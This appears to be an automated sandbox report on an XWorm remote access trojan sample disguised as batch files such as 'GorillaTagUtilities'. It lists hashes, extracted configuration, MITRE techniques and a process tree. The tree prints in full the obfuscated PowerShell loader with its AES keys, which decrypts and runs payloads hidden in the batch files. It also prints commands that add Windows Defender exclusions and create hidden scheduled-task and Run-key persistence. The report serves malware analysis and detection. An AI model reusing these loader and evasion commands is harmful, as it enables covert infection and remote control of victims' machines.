xworm | fd9af97638b947c8c1142bc54efa2668a8b65ccdfdbc2c08ff4d338bfa55620f

Analysis

max time kernel
150s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
20-04-2024 10:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Rat.bat
Size

557KB
MD5

c88576f629b0a738df2ed3238ab890c6
SHA1

158b12ab42db9a32b2570080e2fda2f4742486df
SHA256

fd9af97638b947c8c1142bc54efa2668a8b65ccdfdbc2c08ff4d338bfa55620f
SHA512

c090ad0c9a3734419b130311e5a812300e9c3e66e7fe2cc4c2d27e257874b6854f754e563ceff68ff6497628e4dcc42d8cb31a106609ff2b8a581f0bbb7bfe5a
SSDEEP

12288:yAGRzigrEv/QWBDiqBTTxzqp3rQWh5TIi0xv/NcnESDHn2:VGtUuq1lhCth43SDW

Score

10^/10

xworm persistence rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

127.0.0.1:7000

Mutex

TQv1TZmQOLwovJma

Attributes

Install_directory
%AppData%
install_file
Client.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4716-57-0x0000020661F40000-0x0000020661F50000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Blocklisted process makes network request 8 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

34 4716 powershell.exe
36 3628
41 3628
44 3628
46 3628
48 3628
51 5084 powershell.exe
63 5084 powershell.exe

flow	pid	process
34	4716	powershell.exe
36	3628
41	3628
44	3628
46	3628
48	3628
51	5084	powershell.exe
63	5084	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 4 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Client.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Client.lnk	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77windows32.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77windows32.lnk	powershell.exe

Executes dropped EXE 3 IoCs

Processes:

GorillaTagUtilities.exeClient.exe$77windows32.exe

pid process

2304 GorillaTagUtilities.exe
4464 Client.exe
2040 $77windows32.exe

pid	process
2304	GorillaTagUtilities.exe
4464	Client.exe
2040	$77windows32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Client = "C:\\Users\\Admin\\AppData\\Roaming\\Client.exe"	powershell.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

33 ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

952 schtasks.exe
3828 schtasks.exe

flow	ioc
33	ip-api.com

pid	process
952	schtasks.exe
3828	schtasks.exe

Modifies registry class 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings	powershell.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 49 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeClient.exe$77windows32.exe

pid	process
2120	powershell.exe
2120	powershell.exe
3780	powershell.exe
3780	powershell.exe
3780	powershell.exe
4716	powershell.exe
4716	powershell.exe
4464	powershell.exe
4464	powershell.exe
4464	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3780	powershell.exe
3780	powershell.exe
3780	powershell.exe
5084	powershell.exe
5084	powershell.exe
5084	powershell.exe
1592	powershell.exe
1592	powershell.exe
1592	powershell.exe
4744	powershell.exe
4744	powershell.exe
4744	powershell.exe
4648	powershell.exe
4648	powershell.exe
5088	powershell.exe
5088	powershell.exe
4648	powershell.exe
5088	powershell.exe
1916	powershell.exe
1916	powershell.exe
1916	powershell.exe
4080	powershell.exe
4080	powershell.exe
4080	powershell.exe
4716	powershell.exe
4716	powershell.exe
3628	powershell.exe
3628	powershell.exe
3628	powershell.exe
5084	powershell.exe
4464	Client.exe
4464	Client.exe
2040	$77windows32.exe
2040	$77windows32.exe
4464	Client.exe
2040	$77windows32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2120	powershell.exe
Token: SeDebugPrivilege	3780	powershell.exe
Token: SeIncreaseQuotaPrivilege	3780	powershell.exe
Token: SeSecurityPrivilege	3780	powershell.exe
Token: SeTakeOwnershipPrivilege	3780	powershell.exe
Token: SeLoadDriverPrivilege	3780	powershell.exe
Token: SeSystemProfilePrivilege	3780	powershell.exe
Token: SeSystemtimePrivilege	3780	powershell.exe
Token: SeProfSingleProcessPrivilege	3780	powershell.exe
Token: SeIncBasePriorityPrivilege	3780	powershell.exe
Token: SeCreatePagefilePrivilege	3780	powershell.exe
Token: SeBackupPrivilege	3780	powershell.exe
Token: SeRestorePrivilege	3780	powershell.exe
Token: SeShutdownPrivilege	3780	powershell.exe
Token: SeDebugPrivilege	3780	powershell.exe
Token: SeSystemEnvironmentPrivilege	3780	powershell.exe
Token: SeRemoteShutdownPrivilege	3780	powershell.exe
Token: SeUndockPrivilege	3780	powershell.exe
Token: SeManageVolumePrivilege	3780	powershell.exe
Token: 33	3780	powershell.exe
Token: 34	3780	powershell.exe
Token: 35	3780	powershell.exe
Token: 36	3780	powershell.exe
Token: SeIncreaseQuotaPrivilege	3780	powershell.exe
Token: SeSecurityPrivilege	3780	powershell.exe
Token: SeTakeOwnershipPrivilege	3780	powershell.exe
Token: SeLoadDriverPrivilege	3780	powershell.exe
Token: SeSystemProfilePrivilege	3780	powershell.exe
Token: SeSystemtimePrivilege	3780	powershell.exe
Token: SeProfSingleProcessPrivilege	3780	powershell.exe
Token: SeIncBasePriorityPrivilege	3780	powershell.exe
Token: SeCreatePagefilePrivilege	3780	powershell.exe
Token: SeBackupPrivilege	3780	powershell.exe
Token: SeRestorePrivilege	3780	powershell.exe
Token: SeShutdownPrivilege	3780	powershell.exe
Token: SeDebugPrivilege	3780	powershell.exe
Token: SeSystemEnvironmentPrivilege	3780	powershell.exe
Token: SeRemoteShutdownPrivilege	3780	powershell.exe
Token: SeUndockPrivilege	3780	powershell.exe
Token: SeManageVolumePrivilege	3780	powershell.exe
Token: 33	3780	powershell.exe
Token: 34	3780	powershell.exe
Token: 35	3780	powershell.exe
Token: 36	3780	powershell.exe
Token: SeIncreaseQuotaPrivilege	3780	powershell.exe
Token: SeSecurityPrivilege	3780	powershell.exe
Token: SeTakeOwnershipPrivilege	3780	powershell.exe
Token: SeLoadDriverPrivilege	3780	powershell.exe
Token: SeSystemProfilePrivilege	3780	powershell.exe
Token: SeSystemtimePrivilege	3780	powershell.exe
Token: SeProfSingleProcessPrivilege	3780	powershell.exe
Token: SeIncBasePriorityPrivilege	3780	powershell.exe
Token: SeCreatePagefilePrivilege	3780	powershell.exe
Token: SeBackupPrivilege	3780	powershell.exe
Token: SeRestorePrivilege	3780	powershell.exe
Token: SeShutdownPrivilege	3780	powershell.exe
Token: SeDebugPrivilege	3780	powershell.exe
Token: SeSystemEnvironmentPrivilege	3780	powershell.exe
Token: SeRemoteShutdownPrivilege	3780	powershell.exe
Token: SeUndockPrivilege	3780	powershell.exe
Token: SeManageVolumePrivilege	3780	powershell.exe
Token: 33	3780	powershell.exe
Token: 34	3780	powershell.exe
Token: 35	3780	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

4716 powershell.exe
5084 powershell.exe

pid	process
4716	powershell.exe
5084	powershell.exe

Suspicious use of WriteProcessMemory 60 IoCs

Processes:

cmd.exenet.exepowershell.exeWScript.execmd.exenet.exepowershell.execmd.exenet.exepowershell.exeWScript.execmd.exenet.exepowershell.exe

description	pid	process	target process
PID 2744 wrote to memory of 5008	2744	cmd.exe	net.exe
PID 2744 wrote to memory of 5008	2744	cmd.exe	net.exe
PID 5008 wrote to memory of 3112	5008	net.exe	net1.exe
PID 5008 wrote to memory of 3112	5008	net.exe	net1.exe
PID 2744 wrote to memory of 2120	2744	cmd.exe	powershell.exe
PID 2744 wrote to memory of 2120	2744	cmd.exe	powershell.exe
PID 2120 wrote to memory of 3780	2120	powershell.exe	powershell.exe
PID 2120 wrote to memory of 3780	2120	powershell.exe	powershell.exe
PID 2120 wrote to memory of 3668	2120	powershell.exe	WScript.exe
PID 2120 wrote to memory of 3668	2120	powershell.exe	WScript.exe
PID 3668 wrote to memory of 3404	3668	WScript.exe	cmd.exe
PID 3668 wrote to memory of 3404	3668	WScript.exe	cmd.exe
PID 3404 wrote to memory of 1100	3404	cmd.exe	net.exe
PID 3404 wrote to memory of 1100	3404	cmd.exe	net.exe
PID 1100 wrote to memory of 2816	1100	net.exe	net1.exe
PID 1100 wrote to memory of 2816	1100	net.exe	net1.exe
PID 3404 wrote to memory of 4716	3404	cmd.exe	powershell.exe
PID 3404 wrote to memory of 4716	3404	cmd.exe	powershell.exe
PID 4716 wrote to memory of 3684	4716	powershell.exe	cmd.exe
PID 4716 wrote to memory of 3684	4716	powershell.exe	cmd.exe
PID 3684 wrote to memory of 4012	3684	cmd.exe	net.exe
PID 3684 wrote to memory of 4012	3684	cmd.exe	net.exe
PID 4012 wrote to memory of 3908	4012	net.exe	net1.exe
PID 4012 wrote to memory of 3908	4012	net.exe	net1.exe
PID 3684 wrote to memory of 4464	3684	cmd.exe	powershell.exe
PID 3684 wrote to memory of 4464	3684	cmd.exe	powershell.exe
PID 4464 wrote to memory of 3948	4464	powershell.exe	powershell.exe
PID 4464 wrote to memory of 3948	4464	powershell.exe	powershell.exe
PID 4464 wrote to memory of 4252	4464	powershell.exe	WScript.exe
PID 4464 wrote to memory of 4252	4464	powershell.exe	WScript.exe
PID 4716 wrote to memory of 3780	4716	powershell.exe	powershell.exe
PID 4716 wrote to memory of 3780	4716	powershell.exe	powershell.exe
PID 4252 wrote to memory of 1796	4252	WScript.exe	cmd.exe
PID 4252 wrote to memory of 1796	4252	WScript.exe	cmd.exe
PID 1796 wrote to memory of 2016	1796	cmd.exe	net.exe
PID 1796 wrote to memory of 2016	1796	cmd.exe	net.exe
PID 2016 wrote to memory of 2600	2016	net.exe	net1.exe
PID 2016 wrote to memory of 2600	2016	net.exe	net1.exe
PID 1796 wrote to memory of 5084	1796	cmd.exe	powershell.exe
PID 1796 wrote to memory of 5084	1796	cmd.exe	powershell.exe
PID 4716 wrote to memory of 1592	4716	powershell.exe	powershell.exe
PID 4716 wrote to memory of 1592	4716	powershell.exe	powershell.exe
PID 5084 wrote to memory of 2304	5084	powershell.exe	GorillaTagUtilities.exe
PID 5084 wrote to memory of 2304	5084	powershell.exe	GorillaTagUtilities.exe
PID 4716 wrote to memory of 4744	4716	powershell.exe	powershell.exe
PID 4716 wrote to memory of 4744	4716	powershell.exe	powershell.exe
PID 5084 wrote to memory of 4648	5084	powershell.exe	powershell.exe
PID 5084 wrote to memory of 4648	5084	powershell.exe	powershell.exe
PID 4716 wrote to memory of 5088	4716	powershell.exe	powershell.exe
PID 4716 wrote to memory of 5088	4716	powershell.exe	powershell.exe
PID 5084 wrote to memory of 1916	5084	powershell.exe	powershell.exe
PID 5084 wrote to memory of 1916	5084	powershell.exe	powershell.exe
PID 4716 wrote to memory of 952	4716	powershell.exe	schtasks.exe
PID 4716 wrote to memory of 952	4716	powershell.exe	schtasks.exe
PID 5084 wrote to memory of 4080	5084	powershell.exe	powershell.exe
PID 5084 wrote to memory of 4080	5084	powershell.exe	powershell.exe
PID 5084 wrote to memory of 3628	5084	powershell.exe	powershell.exe
PID 5084 wrote to memory of 3628	5084	powershell.exe	powershell.exe
PID 5084 wrote to memory of 3828	5084	powershell.exe	schtasks.exe
PID 5084 wrote to memory of 3828	5084	powershell.exe	schtasks.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Rat.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2744
- C:\Windows\system32\net.exe
  net file
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5008
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 file
    3⤵
    PID:3112
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HM+/uw3VIbvfzCE0IMy71A0087SFUx9DztvDpXYML44='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EwTj1dlF4Nyp9MG/yZks5w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HJGzG=New-Object System.IO.MemoryStream(,$param_var); $KHsiD=New-Object System.IO.MemoryStream; $rUSlj=New-Object System.IO.Compression.GZipStream($HJGzG, [IO.Compression.CompressionMode]::Decompress); $rUSlj.CopyTo($KHsiD); $rUSlj.Dispose(); $HJGzG.Dispose(); $KHsiD.Dispose(); $KHsiD.ToArray();}function execute_function($param_var,$param2_var){ $gHVNY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XBKrw=$gHVNY.EntryPoint; $XBKrw.Invoke($null, $param2_var);}$bOtAV = 'C:\Users\Admin\AppData\Local\Temp\Rat.bat';$host.UI.RawUI.WindowTitle = $bOtAV;$VXMTQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bOtAV).Split([Environment]::NewLine);foreach ($JPSkT in $VXMTQ) { if ($JPSkT.StartsWith(':: ')) { $bQwAB=$JPSkT.Substring(3); break; }}$payloads_var=[string[]]$bQwAB.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2120
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_148_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_148.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3780
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_148.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:3668
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_148.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3404
    - - C:\Windows\system32\net.exe
        
        net file
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1100
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        6⤵
        
        PID:2816
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HM+/uw3VIbvfzCE0IMy71A0087SFUx9DztvDpXYML44='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EwTj1dlF4Nyp9MG/yZks5w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HJGzG=New-Object System.IO.MemoryStream(,$param_var); $KHsiD=New-Object System.IO.MemoryStream; $rUSlj=New-Object System.IO.Compression.GZipStream($HJGzG, [IO.Compression.CompressionMode]::Decompress); $rUSlj.CopyTo($KHsiD); $rUSlj.Dispose(); $HJGzG.Dispose(); $KHsiD.Dispose(); $KHsiD.ToArray();}function execute_function($param_var,$param2_var){ $gHVNY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XBKrw=$gHVNY.EntryPoint; $XBKrw.Invoke($null, $param2_var);}$bOtAV = 'C:\Users\Admin\AppData\Roaming\startup_str_148.bat';$host.UI.RawUI.WindowTitle = $bOtAV;$VXMTQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bOtAV).Split([Environment]::NewLine);foreach ($JPSkT in $VXMTQ) { if ($JPSkT.StartsWith(':: ')) { $bQwAB=$JPSkT.Substring(3); break; }}$payloads_var=[string[]]$bQwAB.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Blocklisted process makes network request
        Drops startup file
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4716
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GorillaTagUtilities.bat" "
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3684
        
        C:\Windows\system32\net.exe
        
        net file
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:4012
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        8⤵
        
        PID:3908
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7KdUSSC9OeCVIcrKQQO2y3pSr7kdahXrU2bQ3WxtWH0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CO38/swHIabz03JHx3ThEA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cMpji=New-Object System.IO.MemoryStream(,$param_var); $wyJuj=New-Object System.IO.MemoryStream; $WceOa=New-Object System.IO.Compression.GZipStream($cMpji, [IO.Compression.CompressionMode]::Decompress); $WceOa.CopyTo($wyJuj); $WceOa.Dispose(); $cMpji.Dispose(); $wyJuj.Dispose(); $wyJuj.ToArray();}function execute_function($param_var,$param2_var){ $PpPoi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $aIYSy=$PpPoi.EntryPoint; $aIYSy.Invoke($null, $param2_var);}$vdyOi = 'C:\Users\Admin\AppData\Local\Temp\GorillaTagUtilities.bat';$host.UI.RawUI.WindowTitle = $vdyOi;$faopF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($vdyOi).Split([Environment]::NewLine);foreach ($ycagG in $faopF) { if ($ycagG.StartsWith(':: ')) { $ziaik=$ycagG.Substring(3); break; }}$payloads_var=[string[]]$ziaik.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        7⤵
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4464
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_535_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_535.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3948
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_535.vbs"
        8⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:4252
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_535.bat" "
        9⤵
        Suspicious use of WriteProcessMemory
        
        PID:1796
        
        C:\Windows\system32\net.exe
        
        net file
        10⤵
        Suspicious use of WriteProcessMemory
        
        PID:2016
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        11⤵
        
        PID:2600
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7KdUSSC9OeCVIcrKQQO2y3pSr7kdahXrU2bQ3WxtWH0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CO38/swHIabz03JHx3ThEA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cMpji=New-Object System.IO.MemoryStream(,$param_var); $wyJuj=New-Object System.IO.MemoryStream; $WceOa=New-Object System.IO.Compression.GZipStream($cMpji, [IO.Compression.CompressionMode]::Decompress); $WceOa.CopyTo($wyJuj); $WceOa.Dispose(); $cMpji.Dispose(); $wyJuj.Dispose(); $wyJuj.ToArray();}function execute_function($param_var,$param2_var){ $PpPoi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $aIYSy=$PpPoi.EntryPoint; $aIYSy.Invoke($null, $param2_var);}$vdyOi = 'C:\Users\Admin\AppData\Roaming\startup_str_535.bat';$host.UI.RawUI.WindowTitle = $vdyOi;$faopF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($vdyOi).Split([Environment]::NewLine);foreach ($ycagG in $faopF) { if ($ycagG.StartsWith(':: ')) { $ziaik=$ycagG.Substring(3); break; }}$payloads_var=[string[]]$ziaik.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        10⤵
        Blocklisted process makes network request
        Drops startup file
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:5084
        
        C:\Users\Admin\AppData\Local\Temp\GorillaTagUtilities.exe
        
        "C:\Users\Admin\AppData\Local\Temp\GorillaTagUtilities.exe"
        11⤵
        Executes dropped EXE
        
        PID:2304
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        11⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4648
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        11⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1916
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\$77windows32.exe '
        11⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4080
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77windows32.exe '
        11⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3628
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77windows32" /tr "C:\ProgramData\$77windows32.exe "
        11⤵
        Creates scheduled task(s)
        
        PID:3828
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3780
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1592
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Client.exe'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4744
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Client.exe'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5088
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Client" /tr "C:\Users\Admin\AppData\Roaming\Client.exe"
        6⤵
        Creates scheduled task(s)
        
        PID:952

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3936 --field-trial-handle=2304,i,6987730730348465820,3913273227385401271,262144 --variations-seed-version /prefetch:8
1⤵
PID:4540

C:\Users\Admin\AppData\Roaming\Client.exe
